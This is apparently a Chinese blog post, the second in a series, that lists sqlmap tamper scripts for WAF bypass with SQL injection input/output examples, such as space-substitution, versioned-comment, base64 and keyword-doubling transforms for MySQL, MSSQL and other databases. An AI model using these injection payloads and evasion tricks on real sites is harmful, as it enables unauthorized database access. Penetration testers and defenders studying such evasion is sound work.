注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

Sqlmap Tamper大全(2)  

2014-08-12 10:43:42|  分类: WAF绕过 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
脚本名:base64encode.py
作用:用base64编码替换
Example:

1
2
("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

Requirement:
all
————————————————-
脚本名:space2mssqlhash.py
作用:替换空格
Example:

1
2
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

Requirement:
* MSSQL
* MySQL
————————————————-
脚本名:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
Example:

1
2
('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'

Requirement:
* MySQL
Tested against:
* MySQL 5.0
————————————————-
脚本名:space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
Example:

1
2
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users

Requirement:
* MySQL
Tested against:
* MySQL 5.1

1
2
3
4
5
6
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return
#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)
#   -       A0      -                   (MySQL only)

———————————————————————————-
脚本名:between.py
作用:用between替换大于号(>)
Example:

1
2
('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————————-
脚本名:modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
Example:

1
2
('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'

Requirement:
* MySQL
Tested against:
* MySQL 5.0
———————————————————————————-
脚本名:space2mysqldash.py
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
91ri.org注:之前有个mssql的 这个是mysql的
Example:

1
2
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

Requirement:
* MySQL
* MSSQL
———————————————————————————-
脚本名:multiplespaces.py
作用:围绕SQL关键字添加多个空格
Example:

1
2
('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

Tested against:
all
———————————————————————————-
脚本名:space2plus.py
作用:用+替换空格
Example:

1
2
('SELECT id FROM users')
'SELECT+id+FROM+users'

Tested against:
all
———————————————————————————-
脚本名:bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。
然后替换=为like
Example:

1
2
('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'

Tested against:
* MySQL 5.1, SGOS
———————————————————————————-
脚本名:nonrecursivereplacement.py
双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如  .replace(“SELECT”、””)) filters
Example:

1
2
('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'

Tested against:
all
———————————————————————————-
脚本名:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
Example:

1
2
('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'

Tested against:
all
———————————————————————————
脚本名:percentage.py
作用:asp允许每个字符前面添加一个%号
Example:

1
2
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
———————————————————————————
传送门:《sqlmap tamper 大全(3)
  评论这张
 
阅读(78)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017